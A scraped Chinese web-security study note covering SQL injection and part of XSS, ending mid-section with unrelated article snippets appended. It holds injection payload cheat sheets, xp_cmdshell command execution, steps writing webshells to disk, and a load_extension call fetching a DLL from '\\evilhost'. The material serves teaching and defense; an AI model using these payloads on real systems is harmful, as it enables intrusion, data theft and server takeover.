AA8j
AA8j

【Web安全笔记】之【4.0 常见漏洞攻防】

文章目录

  • 4.0 常见漏洞攻防
    • 4.1 SQL注入
      • 4.1.1 注入分类
        • 1. 简介
        • 2. 按技巧分类
          • 1). 盲注
          • 2). 报错注入
          • 3). 堆叠注入
        • 3. 按获取数据的方式分类
          • 1). inband
          • 2). inference
          • 3). out of band (OOB)
      • 4.1.2 数据库检测
        • 1. MySQL
        • 2. Oracle
        • 3. SQLServer
        • 4. PostgreSQL
      • 4.1.3 注入检测
        • 1. 常见的注入点
        • 2. Fuzz注入点
        • 3. 测试用常量
        • 4. 测试列数
        • 5. 报错注入
        • 6. 基于geometric的报错注入
        • 7. 堆叠注入
        • 8. 注释符
        • 9. 判断过滤规则
      • 4.1.4 绕过技巧
        • 1. 编码绕过
        • 2. 注释
        • 3. 只过滤了一次时
        • 4. 相同功能替换
          • 1). 函数替换
          • 2). 变量替换
          • 3). 符号和关键字
        • 5. HTTP参数
        • 6. 缓冲区溢出
      • 4.1.5 获取信息
        • 1. 判断数据库类型
        • 2. 判断数据库表
        • 3. 版本、主机名、用户名、库名
        • 4. 表和字段
      • 4.1.6 测试权限
        • 1. 文件操作
        • 2. 带外通道
      • 4.1.7 权限提升
        • 1. UDF提权
      • 4.1.8 SQL注入小技巧
        • 1. 宽字节注入
        • 2. CheatSheet
          • 1). SQL Server Payload
            • 常见Payload
            • 报错注入
            • 常用函数
          • 2). MySQL Payload
            • 常见Payload
            • 报错注入常见函数
            • 写文件
          • 3). PostgresSQL Payload
          • 4). Oracle Payload
            • 常见Payload
            • 写文件
          • 5). SQLite3 Payload
      • 4.1.9 预编译
        • 1. 简介
        • 2. 模拟预编译
        • 3. 绕过
          • 1). 预编译使用错误
          • 2). 部分参数不可预编译
          • 3). 预编译实现错误
      • 4.1.10 参考文章
    • 4.2 XSS
      • 4.2.1 分类
        • 1 简介
        • 2. 反射型XSS
        • 3. 储存型XSS
        • 4. DOM XSS
        • 5. Blind XSS
      • 4.2.2 危害
      • 4.2.3 同源策略
        • 1. 简介
        • 2. file域的同源策略
        • 3. cookie的同源策略
        • 4. Flash/SilverLight跨域
        • 5. 源的更改
        • 6. 跨源访问
        • 7. JSONP跨域
        • 8. 跨源脚本API访问
        • 9. 跨源数据存储访问
          • CORS
            • 常见请求头
            • 常见返回头
            • 防御建议
        • 10. 阻止跨源访问
      • 4.2.4 CSP
        • 1. CSP是什么?
        • 2. 配置
        • 3. 指令说明
        • 4. 关键字
        • 5. 配置范例
      • 4.2.5 Bypass
        • 1. 预加载
        • 2. MIME Sniff
        • 3. 302跳转
        • 4. iframe
        • 5. base-uri
        • 6. 其他
      • 4.2.6 XSS数据源
        • 1. URL
        • 2. Navigation
        • 3. Communication
        • 4. Storage
        • 5. Sink
          • 1). 执行JavaScript
          • 2). 加载URL
          • 3). 执行HTML
      • 4.2.7 XSS保护
        • 1. HTML过滤
        • 2. X-Frame
        • 3. XSS保护头
      • 4.2.8 WAF Bypass
      • 4.2.9 技巧
        • 1. httponly
        • 2. CSS 注入
          • 1). 基本介绍
          • 2). CSS selectors
          • 3). Abusing Unicode Range
        • 3. Bypass Via Script Gadgets
          • 1). 简介
          • 2). 例子
        • 4. RPO(Relative Path Overwrite)
      • 4.2.10 Payload
        • 1. 常用
        • 2. 大小写绕过
        • 3. 各种alert
        • 4. 伪协议
        • 5. Chrome XSS auditor bypass
        • 6. 长度限制
        • 7. jquery sourceMappingURL
        • 8. 图片名
        • 9. 过期的payload
        • 10. css
        • 11. markdown
        • 12. iframe
        • 13. form
        • 14. meta
      • 4.2.11 持久化
        • 1. 基于存储
        • 2. Service Worker
        • 3. AppCache
      • 4.2.12 参考链接
        • wiki
        • Challenges
        • CSS
        • 同源策略
        • bypass
        • 持久化
        • Tricks
    • 4.3 CSRF
      • 4.3.1 简介
      • 4.3.2 分类
        • 1. 资源包含
        • 2. 基于表单
        • 3. XMLHttpRequest
      • 4.3.3 防御
      • 4.3.4 参考链接
    • 4.4 SSRF
      • 4.4.1 简介
      • 4.4.2 漏洞危害
      • 4.4.3 利用方式
      • 4.4.4 相关危险函数
      • 4.4.5 过滤绕过
        • 1. 更改IP地址写法
        • 2. 使用解析到内网的域名
        • 3. 利用解析URL所出现的问题
        • 4. 利用跳转
        • 5. 通过各种非HTTP协议
        • 6. DNS Rebinding
        • 7. 利用IPv6
        • 8. 利用IDN
      • 4.4.6 可能的利用点
        • 1. 内网服务
        • 2. Redis利用
        • 3. 云主机
      • 4.4.7 防御方式
      • 4.4.8 参考链接
    • 4.5 命令注入
      • 4.5.1 简介
      • 4.5.2 常见危险函数
        • 1. PHP
        • 2. Python
        • 3. Java
      • 4.5.3 常见注入方式
        • 无回显技巧
      • 4.5.4 常见绕过方式
        • 1. 空格绕过
        • 2. 黑名单绕过
        • 3. 长度限制绕过
      • 4.5.5 常用符号
        • 1. 命令分隔符
        • 2. 通配符
      • 4.5.6 防御
    • 4.6 目录穿越
      • 4.6.1 简介
      • 4.6.2 攻击载荷
        • 1. URL参数
        • 2. Nginx Off by Slash
        • 3. UNC Bypass
      • 4.6.3 过滤绕过
      • 4.6.4 防御
      • 4.6.5 参考链接
    • 4.7 文件读取
    • 4.8 文件上传
      • 4.8.1 文件类型检测绕过
        • 1. 更改请求绕过
        • 2. Magic 检测绕过
        • 3. 后缀绕过
        • 4. 系统命名绕过
        • 5. .user.ini
        • 6. WAF绕过
        • 7. 竞争上传绕过
      • 4.8.2 攻击技巧
        • 1. Apache重写GetShell
        • 2. 软链接任意读文件
      • 4.8.3 防护技巧
      • 4.8.4 参考链接
    • 4.9 文件包含
      • 4.9.1 基础
      • 4.9.2 触发Sink
        • 1. PHP
      • 4.9.3 绕过技巧
        • 1. url编码绕过
        • 2. 特殊字符绕过
        • 3. %00截断
        • 4. 长度截断
        • 5. 伪协议绕过
        • 6. 协议绕过
      • 4.9.4 参考链接
    • 4.10 XXE
      • 4.10.1 XML基础
        • 1. 基本语法
        • 2. XXE
      • 4.10.2 攻击方式
        • 1. 拒绝服务攻击
        • 2. 文件读取
        • 3. SSRF
        • 4. RCE
        • 5. XInclude
      • 4.10.3 参考链接
    • 4.11 模版注入
      • 4.11.1 简介
      • 4.11.2 测试方法
      • 4.11.3 测试用例
      • 4.11.4目标
      • 4.11.5 相关属性
        • 1. `__class__`
        • 2. `__mro__`
        • 3. `__globals__`
        • 4. `__subclasses__()`
      • 4.11.6 常见Payload
      • 4.11.7 绕过技巧
        • 1. 字符串拼接
        • 2. 使用参数绕过
      • 4.11.8 参考链接
    • 4.12 Xpath注入
      • 4.12.1 Xpath 定义
      • 4.11.2 Xpath注入攻击原理
    • 4.13 逻辑漏洞 / 业务漏洞
      • 4.13.1 简介
      • 4.13.2 安装逻辑
      • 4.13.4 交易
          • 1. 购买
          • 2. 业务风控
      • 4.13.5 账户
        • 1. 注册
        • 2. 密码
        • 3. 邮箱用户名
        • 4. Cookie
        • 5. 手机号用户名
        • 6. 登录
        • 7. 找回密码
        • 8. 修改密码
        • 9. 申诉
        • 10. 更新
        • 11. 信息查询
        • 12. 2FA
      • 4.13.5 验证码
      • 4.13.6 Session
      • 4.13.7 越权
      • 4.13.8 随机数安全
      • 4.13.9 其他
      • 4.13.10 参考链接
    • 4.14 配置安全
      • 4.14.1 弱密码
      • 4.14.2 敏感文件泄漏
      • 4.14.3 数据库
      • 4.14.4 加密体系
      • 4.14.5 三方库/软件
    • 4.15 中间件
      • 4.15.1 IIS
        • 1. IIS 6.0
        • 2. IIS 7.0-7.5 / Nginx <= 0.8.37
        • 3. PUT漏洞
        • 4. Windows特性
        • 5. 文件名猜解
        • 6. 参考链接
      • 4.15.2 Apache
        • 1. 后缀解析
        • 2. .htaccess
        • 3. 目录遍历
        • 4. CVE-2017-15715
        • 5. lighttpd
        • 6. 参考链接
      • 4.15.3 Nginx
        • 1. Fast-CGI关闭
        • 2. Fast-CGI开启
        • 3. CVE-2013-4547
        • 4. 配置错误
          • 目录穿越/遍历
        • 5. 参考链接
    • 4.16 Web Cache欺骗攻击
      • 4.16.1 简介
      • 4.16.2 漏洞成因
      • 4.16.3 漏洞利用
      • 4.16.4 漏洞存在的条件
      • 4.16.5 漏洞防御
      • 4.16.6 Web Cache欺骗攻击实例
        • 1. Paypal
      • 4.16.7 参考链接
    • 4.17 HTTP 请求走私
      • 4.17.1 简介
      • 4.17.2 成因
      • 4.17.3 分类
      • 4.17.4 攻击
        • 1. CL不为0的GET请求
        • 2. CL-CL
        • 3. CL-TE
        • 4. TE-CL
        • 5. TE-TE
      • 4.17.5 防御
      • 4.17.6 参考链接
        • 1. RFC
        • 2. Blog / Whitepaper

4.0 常见漏洞攻防

4.1 SQL注入

4.1.1 注入分类

1. 简介

SQL注入是一种代码注入技术,用于攻击数据驱动的应用程序。 在应用程序中,如果没有做恰当的过滤,则可能使得恶意的SQL语句被插入输入字段中执行(例如将数据库内容转储给攻击者)。

2. 按技巧分类

根据使用的技巧,SQL注入类型可分为

1). 盲注
  • 布尔盲注:只能从应用返回中推断语句执行后的布尔值
  • 时间盲注:应用没有明确的回显,只能使用特定的时间函数来判断
2). 报错注入

应用会显示全部或者部分的报错信息

3). 堆叠注入

有的应用可以加入 ; 后一次执行多条语句

3. 按获取数据的方式分类

另外也可以根据获取数据的方式分为3类:

1). inband

利用Web应用来直接获取数据,如报错注入,这类注入都是通过站点的响应或者错误反馈来提取数据。

2). inference

通过Web的一些反映来推断数据,如布尔盲注,也就是我们通俗的盲注, 通过web应用的其他改变来推断数据。

3). out of band (OOB)

通过其他传输方式来获得数据,比如DNS解析协议和电子邮件。

4.1.2 数据库检测

1. MySQL

  • sleep sleep(1)
  • benchmark BENCHMARK(5000000, MD5('test'))
  • 字符串连接
    • SELECT 'a' 'b'
    • SELECT CONCAT('some','string')
  • version
    • SELECT @@version SELECT version()
  • 识别用函数
    • connection_id()
    • last_insert_id()
    • row_count()

2. Oracle

  • 字符串连接
    • 'a'||'oracle' --
    • SELECT CONCAT('some','string')
  • version
    • SELECT banner FROM v$version
    • SELECT banner FROM v$version WHERE rownum=1

3. SQLServer

  • WAITFOR WAITFOR DELAY '00:00:10';
  • SERVERNAME SELECT @@SERVERNAME
  • version SELECT @@version
  • 字符串连接
    • SELECT 'some'+'string'
  • 常量
    • @@pack_received @@rowcount

4. PostgreSQL

  • sleep pg_sleep(1)

4.1.3 注入检测

1. 常见的注入点

  • GET/POST/PUT/DELETE参数
  • X-Forwarded-For
  • 文件名

2. Fuzz注入点

  • ' / "
  • 1/1
  • 1/0
  • and 1=1
  • " and "1"="1
  • and 1=2
  • or 1=1
  • or 1=
  • ' and '1'='1
  • + - ^ * % /
  • << >> || | & &&
  • ~
  • !
  • @
  • 反引号执行

3. 测试用常量

  • @@version
  • @@servername
  • @@language
  • @@spid

4. 测试列数

例如 http://www.foo.com/index.asp?id=12+union+select+null,null-- ,不断增加 null 至不返回

5. 报错注入

  • select 1/0
  • select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a
  • extractvalue(1, concat(0x5c,(select user())))
  • updatexml(0x3a,concat(1,(select user())),1)
  • exp(~(SELECT * from(select user())a))
  • ST_LatFromGeoHash((select * from(select * from(select user())a)b))
  • GTID_SUBSET(version(), 1)

6. 基于geometric的报错注入

  • GeometryCollection((select * from (select * from(select user())a)b))
  • polygon((select * from(select * from(select user())a)b))
  • multipoint((select * from(select * from(select user())a)b))
  • multilinestring((select * from(select * from(select user())a)b))
  • LINESTRING((select * from(select * from(select user())a)b))
  • multipolygon((select * from(select * from(select user())a)b))

其中需要注意的是,基于exp函数的报错注入在MySQL 5.5.49后的版本已经不再生效,具体可以参考这个 commit 95825f 。

而以上列表中基于geometric的报错注入在这个 commit 5caea4 中被修复,在5.5.x较后的版本中同样不再生效

7. 堆叠注入

  • ;select 1

8. 注释符

  • #
  • --+
  • /*xxx*/
  • /*!xxx*/
  • /*!50000xxx*/

9. 判断过滤规则

  • 是否有trunc
  • 是否过滤某个字符
  • 是否过滤关键字
  • slash和编码

4.1.4 绕过技巧

1. 编码绕过

  • 大小写
  • url编码
  • html编码
  • 十六进制编码
  • unicode编码

2. 注释

  • // -- -- + -- - # /**/ ;%00
  • 内联注释用的更多,它有一个特性 /!**/ 只有MySQL能识别
  • e.g. index.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,2,3

3. 只过滤了一次时

  • union => ununionion

4. 相同功能替换

1). 函数替换
  • substring / mid / sub
  • ascii / hex / bin
  • benchmark / sleep
2). 变量替换
  • user() / @@user
3). 符号和关键字
  • and / &
  • or / |

5. HTTP参数

  • HTTP参数污染

    • id=1&id=2&id=3 根据容器不同会有不同的结果

  • HTTP分割注入

6. 缓冲区溢出

  • 一些C语言的WAF处理的字符串长度有限,超出某个长度后的payload可能不会被处理
    • 二次注入有长度限制时,通过多句执行的方法改掉数据库该字段的长度绕过

4.1.5 获取信息

1. 判断数据库类型

  • and exists (select * from msysobjects ) > 0 access数据库

  • and exists (select * from sysobjects ) > 0 SQLServer数据库

2. 判断数据库表

and exsits (select * from admin)

3. 版本、主机名、用户名、库名

4. 表和字段

  • 确定字段数

    • Order By
    • Select Into

  • 表名、列名

4.1.6 测试权限

1. 文件操作

  • 读敏感文件
  • 写shell

2. 带外通道

  • 网络请求

4.1.7 权限提升

1. UDF提权

UDF(User Defined Function,用户自定义函数)是MySQL提供的一个功能,可以通过编写DLL扩展为MySQL添加新函数,扩充其功能。

当获得MySQL权限之后,即可通过这种方式上传自定义的扩展文件,从MySQL中执行系统命令。

4.1.8 SQL注入小技巧

1. 宽字节注入

一般程序员用gbk编码做开发的时候,会用 set names 'gbk' 来设定,这句话等同于

set
character_set_connection = 'gbk',
character_set_result = 'gbk',
character_set_client = 'gbk';

漏洞发生的原因是执行了 set character_set_client = 'gbk'; 之后,mysql就会认为客户端传过来的数据是gbk编码的,从而使用gbk去解码,而mysql_real_escape是在解码前执行的。但是直接用 set names 'gbk' 的话real_escape是不知道设置的数据的编码的,就会加 %5c 。此时server拿到数据解码 就认为提交的字符+%5c是gbk的一个字符,这样就产生漏洞了。

解决的办法有三种,第一种是把client的charset设置为binary,就不会做一次解码的操作。第二种是是 mysql_set_charset('gbk') ,这里就会把编码的信息保存在和数据库的连接里面,就不会出现这个问题了。 第三种就是用pdo。

还有一些其他的编码技巧,比如latin会弃掉无效的unicode,那么admin%32在代码里面不等于admin,在数据库比较会等于admin。

2. CheatSheet

1). SQL Server Payload
常见Payload

  • Version

    SELECT @@version

  • Comment

    • SELECT 1 -- comment
    • SELECT /*comment*/1

  • Space

    0x01 - 0x20

  • 用户信息

    • SELECT user_name()
    • SELECT system_user
    • SELECT user
    • SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID

  • 用户权限

    • select IS_SRVROLEMEMBER('sysadmin')
    • select IS_SRVROLEMEMBER('db_owner')

  • List User

    - SELECT name FROM master..syslogins

  • 数据库信息

    • SELECT name FROM master..sysdatabases select quotename(name) from master..sysdatabases FOR XML PATH('')

  • 执行命令

    • EXEC xp_cmdshell 'net user'

  • Ascii

    • SELECT char(0x41)
    • SELECT ascii('A')
    • SELECT char(65)+char(66) => return AB

  • Delay

    • WAITFOR DELAY '0:0:3' pause for 3 seconds

  • Change Password

    • ALTER LOGIN [sa] WITH PASSWORD=N'NewPassword'

  • Trick

    • id=1 union:select password from:user

  • 文件读取

    • OpenRowset

  • 当前查询语句

    • select text from sys.dm_exec_requests cross apply sys.dm_exec_sql_text(sql_handle)

  • hostname

    • 用于判断是否站库分离
    • select host_name()
报错注入
  • 1=convert(int,(db_name()))
常用函数
  • SUSER_NAME()
  • USER_NAME()
  • PERMISSIONS()
  • DB_NAME()
  • FILE_NAME()
  • TYPE_NAME()
  • COL_NAME()
2). MySQL Payload
常见Payload

  • Version

    SELECT @@version

  • Comment

    • SELECT 1 -- comment
    • SELECT 1 # comment
    • SELECT /*comment*/1

  • Space

    • 0x9
    • 0xa-0xd
    • 0x20 0xa0

  • Current User

    • SELECT user()
    • SELECT system_user()

  • List User

    • SELECT user FROM mysql.user

  • Current Database

    • SELECT database()

  • List Database

    • SELECT schema_name FROM information_schema.schemata

  • List Tables

    • SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema'

  • List Columns

    • SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema'

  • If

    • SELECT if(1=1,'foo','bar'); return ‘foo’

  • Ascii

    • SELECT char(0x41)
    • SELECT ascii('A')
    • SELECT 0x414243 => return ABC

  • Delay

    • sleep(1)
    • SELECT BENCHMARK(1000000,MD5('A'))

  • Read File

    • select @@datadir
    • select load_file('databasename/tablename.MYD')

  • Blind

    • ascii(substring(str,pos,length)) & 32 = 1

  • Error Based

    • select count(*),(floor(rand(0)*2))x from information_schema.tables group by x;
    • select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))

  • Change Password

    • mysql -uroot -e "use mysql;UPDATE user SET password=PASSWORD('newpassword') WHERE user='root';FLUSH PRIVILEGES;"
报错注入常见函数
  • extractvalue
  • updatexml
  • GeometryCollection
  • linestring
  • multilinestring
  • multipoint
  • multipolygon
  • polygon
  • exp
写文件

写文件前提

  • root 权限
  • 知晓文件绝对路径
  • 写入的路径存在写入权限
  • secure_file_priv 允许向对应位置写入
  • select count(file_priv) from mysql.user

基于 into 写文件

union select 1,1,1 into outfile '/tmp/demo.txt'
union select 1,1,1 into dumpfile '/tmp/demo.txt'

dumpfile和outfile不同在于,outfile会在行末端写入新行,会转义换行符,如果写入二进制文件,很可能被这种特性破坏

基于 log 写文件

show variables like '%general%';
set global general_log = on;
set global general_log_file = '/path/to/file';
select '';
set global general_log_file = '/original/path';
set global general_log = off;
3). PostgresSQL Payload
  • Version
    • SELECT version()
  • Comment
    • SELECT 1 -- comment
    • SELECT /*comment*/1
  • Current User
    • SELECT user
    • SELECT current_user
    • SELECT session_user
    • SELECT getpgusername()
  • List User
    • SELECT usename FROM pg_user
  • Current Database
    • SELECT current_database()
  • List Database
    • SELECT datname FROM pg_database
  • Ascii
    • SELECT char(0x41) SELECT ascii('A')
  • Delay
    • pg_sleep(1)
4). Oracle Payload
常见Payload
  • dump
    • select * from v$tablespace;
    • select * from user_tables;
    • select column_name from user_tab_columns where table_name = 'table_name';
    • select column_name, data_type from user_tab_columns where table_name = 'table_name';
    • SELECT * FROM ALL_TABLES
  • Comment
    • --
    • /**/
  • Space
    • 0x00
    • 0x09
    • 0xa-0xd
    • 0x20
  • 报错
    • utl_inaddr.get_host_name
    • ctxsys.drithsx.sn
    • ctxsys.CTX_REPORT.TOKEN_TYPE
    • XMLType
    • dbms_xdb_version.checkin
    • dbms_xdb_version.makeversioned
    • dbms_xdb_version.uncheckout
    • dbms_utility.sqlid_to_sqlhash
    • ordsys.ord_dicom.getmappingxpath
    • utl_inaddr.get_host_name
    • utl_inaddr.get_host_address
  • OOB
    • utl_http.request
    • utl_inaddr.get_host_address
    • SYS.DBMS_LDAP.INIT
    • HTTPURITYPE
    • HTTP_URITYPE.GETCLOB
  • 绕过
    • rawtohex
写文件
create or replace directory TEST_DIR as '/path/to/dir';
grant read, write on directory TEST_DIR to system;
declare
   isto_file utl_file.file_type;
begin
   isto_file := utl_file.fopen('TEST_DIR', 'test.jsp', 'W');
   utl_file.put_line(isto_file, '<% out.println("test"); %>');
   utl_file.fflush(isto_file);
   utl_file.fclose(isto_file);
end;
5). SQLite3 Payload
  • Comment
    • --
    • /**/
  • Version
    • select sqlite_version();

Command Execution

ATTACH DATABASE '/var/www/lol.php' AS lol;
CREATE TABLE lol.pwn (dataz text);
INSERT INTO lol.pwn (dataz) VALUES ('');--

Load_extension

UNION SELECT 1,load_extension('\\evilhost\evil.dll','E');--

4.1.9 预编译

1. 简介

SQL注入是因为解释器将传入的数据当成命令执行而导致的,预编译是用于解决这个问题的一种方法。和普通的执行流程不同,预编译将一次查询通过两次交互完成,第一次交互发送查询语句的模板,由后端的SQL引擎进行解析为AST或Opcode,第二次交互发送数据,代入AST或Opcode中执行。因为此时语法解析已经完成,所以不会再出现混淆数据和代码的过程。

2. 模拟预编译

为了防止低版本数据库不支持预编译的情况,模拟预编译会在客户端内部模拟参数绑定的过程,进行自定义的转义。

3. 绕过

1). 预编译使用错误

预编译只是使用占位符替代的字段值的部分,如果第一次交互传入的命令使用了字符串拼接,使得命令是攻击者可控的,那么预编译不会生效。

2). 部分参数不可预编译

在有的情况下,数据库处理引擎会检查数据表和数据列是否存在,因此数据表名和列名不能被占位符所替代。这种情况下如果表名和列名可控,则可能引入漏洞。

3). 预编译实现错误

部分语言引擎在实现上存在一定问题,可能会存在绕过漏洞。

4.1.10 参考文章

  • NoSQL注入的分析和缓解
  • NoSQL注入
  • SQL注入ByPass的一些小技巧
  • sqlmap time based inject 分析
  • SQLInjectionWiki
  • Waf Bypass之道
  • MySQL Bypass Wiki
  • 常见数据库写入Webshell汇总

4.2 XSS

4.2.1 分类

1 简介

XSS全称为Cross Site Scripting,为了和CSS分开简写为XSS,中文名为跨站脚本。该漏洞发生在用户端,是指在渲染过程中发生了不在预期过程中的JavaScript代码执行。XSS通常被用于获取Cookie、以受攻击者的身份进行操作等行为。

2. 反射型XSS

反射型XSS是比较常见和广泛的一类,举例来说,当一个网站的代码中包含类似下面的语句:hello, $_GET['user']";?> ,那么在访问时设置 /?user=alert("hack") ,则可执行预设好的JavaScript代码。

反射型XSS通常出现在搜索等功能中,需要被攻击者点击对应的链接才能触发,且受到XSS Auditor、NoScript等防御手段的影响较大。

3. 储存型XSS

储存型XSS相比反射型来说危害较大,在这种漏洞中,攻击者能够把攻击载荷存入服务器的数据库中,造成持久化的攻击

4. DOM XSS

DOM型XSS不同之处在于DOM型XSS一般和服务器的解析响应没有直接关系,而是在JavaScript脚本动态执行的过程中产生的

例如

<html>
<head>
<title>DOM Based XSS Demotitle>
<script>
function xsstest()
{
    var str = document.getElementById("input").value;
    document.getElementById("output").innerHTML = "";
}
script>
head>
<body>
<div id="output">div>
<input type="text" id="input" size=50 value="" />
<input type="button" value="submit" onclick="xsstest()" />
body>
html>

输入 x' onerror='javascript:alert(/xss/) 即可触发。

5. Blind XSS

Blind XSS是储存型XSS的一种,它保存在某些存储中,当一个“受害者”访问这个页面时执行,并且在文档对象模型(DOM)中呈现payload。 它被称为Blind的原因是因为它通常发生在通常不暴露给用户的功能上

4.2.2 危害

存在XSS漏洞时,可能会导致以下几种情况:

  1. 用户的Cookie被获取,其中可能存在Session ID等敏感信息。若服务器端没有做相应防护,攻击者可用对应Cookie登陆服务器。
  2. 攻击者能够在一定限度内记录用户的键盘输入
  3. 攻击者通过CSRF等方式以用户身份执行危险操作
  4. XSS蠕虫
  5. 获取用户浏览器信息
  6. 利用XSS漏洞扫描用户内网

4.2.3 同源策略

1. 简介

同源策略限制了不同源之间如何进行资源交互,是用于隔离潜在恶意文件的重要安全机制。 是否同源由URL决定,URL由协议、域名、端口和路径组成,如果两个URL的协议、域名和端口相同,则表示他们同源

2. file域的同源策略

在之前的浏览器中,任意两个file域的URI被认为是同源的。本地磁盘上的任何HTML文件都可以读取本地磁盘上的任何其他文件。

从Gecko 1.9开始,文件使用了更细致的同源策略,只有当源文件的父目录是目标文件的祖先目录时,文件才能读取另一个文件

3. cookie的同源策略

cookie使用不同的源定义方式,一个页面可以为本域和任何父域设置cookie,只要是父域不是公共后缀(public suffix)即可

不管使用哪个协议(HTTP/HTTPS)或端口号,浏览器都允许给定的域以及其任何子域名访问cookie。设置 cookie时,可以使用 domain / path / securehttp-only 标记来限定其访问性。

所以 https://localhost:8080/http://localhost:8081/ 的Cookie是共享的。

4. Flash/SilverLight跨域

浏览器的各种插件也存在跨域需求。通常是通过在服务器配置crossdomain.xml,设置本服务允许哪些域名的跨域访问。

客户端会请求此文件,如果发现自己的域名在访问列表里,就发起真正的请求,否则不发送请求。

5. 源的更改

同源策略认为域和子域属于不同的域,例如 child1.a.coma.com / child1.a.comchild2.a.com / xxx.child1.a.comchild1.a.com 两两不同源。

对于这种情况,可以在两个方面各自设置 document.domain='a.com' 来改变其源来实现以上任意两个页面之间的通信。

另外因为浏览器单独保存端口号,这种赋值会导致端口号被重写为 null

6. 跨源访问

同源策略控制了不同源之间的交互,这些交互通常分为三类:

  • 通常允许跨域写操作(Cross-origin writes)
    • 链接(links)
    • 重定向
    • 表单提交
  • 通常允许跨域资源嵌入(Cross-origin embedding)
  • 通常不允许跨域读操作(Cross-origin reads)

可能嵌入跨源的资源的一些示例有:

  • 标签嵌入跨域脚本。语法错误信息只能在同源脚本中捕捉到。
  • 标签嵌入CSS。由于CSS的松散的语法规则,CSS的跨域需要一个设置正确的Content-Type 消息头。
  • / / 嵌入多媒体资源。
  • embedapplet 的插件。
  • @font-face 引入的字体。一些浏览器允许跨域字体( cross-origin fonts),一些需要同源字体(same-origin fonts)。
  • frameiframe 载入的任何资源。站点可以使用X-Frame-Options消息头来阻止这种形式的跨域交互。

    • 7. JSONP跨域

    JSONP就是利用

    你可能感兴趣的:(Web安全笔记)

    • 新网师的精神肤色(幕布笔记) 悦读书香
      王子老师的《极简100小妙招》收到已经几天了,之前大概的浏览了全书,今天起给自己定了一个计划,必须每天学习极简小妙招里面的一个妙招,并加以运用。一、今天要打卡什么内容因有完成每天学习极简小妙招的计划,所以今天晚饭吃的比较简单,草草吃完以后带着小宝到广场溜达一圈,急忙赶回来学习极简小妙招。再重看的时候不知道自己要学点什么,打卡哪一招,感觉哪个都简单,就看这一环节像王子老师说的“一看就会”,但做这一环
    • C++学习笔记(lambda函数) __TAT__ C&C++c++学习笔记
      C++learningnote1、lambda函数的语法2、lambda函数的几种用法1、lambda函数的语法lambda函数的一般语法如下:[capture_clause](parameters)->return_type{function_body}capture_clause:需要捕获的变量,但要求该变量必须在这个作用域中。通常的捕获方式有以下几种:[]:不捕获任何变量[&]:按引用捕获变
    • 读书笔记《穿越寒冬》 如雪般飞舞
      各位好,我们今天来讲一本书,名字叫作《穿越寒冬》。看起来特别应景,大家觉得现在创业的状况不景气,大家都在忍受着寒冬的煎熬。但实际上,这本书的英文名字并不是这个意思,它的英文名叫作“如何创立一家新公司,并且能够活下来”。我在整个读完了以后,我发现这本书真正要翻译得好,它的名字应该叫作《创业生存手册》。这个书的作者,来自硅谷的霍夫曼船长。霍夫曼船长写过一本让创业者觉得特别贴心的书,叫作《让大象飞》它和
    • 2018-11-18成长小组学习笔记 实验中学45
      因为嗓子“罢工”,我面对众人只能借“微笑”代言。在开始授课前,绣霞老师先反馈上次作业的情况,提到“接纳”需是真正发自内心的完全接纳,而不是口头上的接纳,内心却是排斥的。提到一个“问题”孩子恰恰对家爱的更加“深沉”,夫妻间的问题不能影响到孩子,对孩子更好的爱不是你为他做的更多,而是给他自由、健康成长的空间。图片发自App一、孩子:家庭的一面镜子夫妻成了彼此的“投射”,婚姻便“吵的不可开交”,婚姻便成
    • 网络安全(黑客)——自学2024 小言同学喜欢挖漏洞 web安全安全网络学习网络安全信息安全渗透测试
      01什么是网络安全网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如Web安全技术,既有Web渗透,也有Web防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。02怎样规划网络安全如果你是一
    • 黑客(网络安全)技术自学30天 一个迷人的黑客 web安全安全网络笔记网络安全信息安全渗透测试
      01什么是网络安全网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如Web安全技术,既有Web渗透,也有Web防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。02怎样规划网络安全如果你是一
    • 【鸿蒙HarmonyOS开发笔记】ArkUI常用组件介绍汇总(更新中) 温、 鸿蒙HarmonyOS开发笔记学习记录harmonyos笔记华为
      概述此文总结开发中用到的一些常用组件,便于查阅,此文持续更新,闲的没事就更线性布局(Row/Column)不多介绍了,最常用的布局组件,两者除了方向不一样,别的都一样方便起见下面只写Column常用属性排列方向上的间距:spaceColumn({space:20}){Row().width('90%').height(50).backgroundColor(0xF5DEB3)Row().width
    • 安卓笔记本 - Handler Message MessageQueue Looper SocialException
      不爱写字,一张图解决。Handler,Message,MessageQueue,Looper工作原理
    • 枚举使用笔记 万变不离其宗_8 项目笔记笔记
      1.java枚举怎么放在方法上面的注释里面/***保存*@paramuserId用户id*@paramtype见枚举{@linkcom.common.enums.TypeEnum}*@return*/voidsave(LonguserId,Stringtype);
    • ruoyi使用笔记 万变不离其宗_8 项目笔记代码参考笔记笔记java前端
      1.限流处理@RateLimiter@PostMapping("/createOrder")@ApiOperation("创建充值订单")@RateLimiter(key=CacheConstants.REPEAT_SUBMIT_KEY,time=10,count=1,limitType=LimitType.IP)publicRcreateOrder(@RequestBodyFormform){/
    • 数据管理知识体系指南(第二版)-第五章——数据建模和设计-学习笔记 键盘上的五花肉 数据治理数据库数据仓库数据治理
      目录5.1引言5.1.1业务驱动因素5.1.2目标和原则5.1.3基本概念5.2活动5.2.1规划数据建模5.2.2建立数据模型5.2.3审核数据模型5.2.4维护数据模型5.3工具5.3.1数据建模工具5.3.2数据血缘工具5.3.3数据分析工具5.3.4元数据资料库5.3.5数据模型模式5.3.6行业数据模型5.4方法5.4.1命名约定的最佳实践5.4.2数据库设计中的最佳实践5.5数据建模和
